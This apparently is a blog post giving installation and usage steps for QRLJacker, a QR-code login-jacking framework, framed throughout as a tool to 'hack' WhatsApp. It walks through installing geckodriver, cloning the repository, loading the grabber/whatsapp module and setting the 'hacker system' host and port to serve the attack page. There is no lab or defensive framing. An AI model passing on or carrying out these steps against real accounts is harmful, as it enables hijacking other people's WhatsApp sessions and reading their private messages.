Requirements

1. Kali Linux OS
2. Whatsapp to hack
3. Python 3.7 +


Installing instructions:

 If you have multiple python version, use python3.7 command instead of python3 in the following steps and use python3.7 -m pip instead of pip, pip3 or even python3 -m pip because that's the reason of 95% of the issues opened here. I think people often skip the important parts

1. Update Firefox browser to the latest version.

2. Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file then do :

  • chmod +x geckodriver
  • sudo mv -f geckodriver /usr/local/share/geckodriver
  • sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
  • sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

3.Clone the repo with git clone https://github.com/OWASP/QRLJacking then do cd QRLJacking/QRLJacker

4. 
Install all the requirements with pip install -r requirements.txt

5. Now you can run the framework with python3 QrlJacker.py

Commands Used post running the python script


list  ( Used to check the commands supported to QRLJacker )


use grabber/whatsapp   (Used to activate the command grabber/whatsapp)


options (Used to check the option available under grabber/whatsapp)


set port 1337 (Used to set the port number for QRLJacker to communicate with hacker system )


Set host localhost  (Used to set the ipaddress of the hacker system. This will help the QRLJacker to communicate with the system )


Run (used to run the script post setting the port number and ipaddress for QRLJacker to communicate)


 Open browser and enter the address localhost:1337 and run the command.

Post a Comment

أحدث أقدم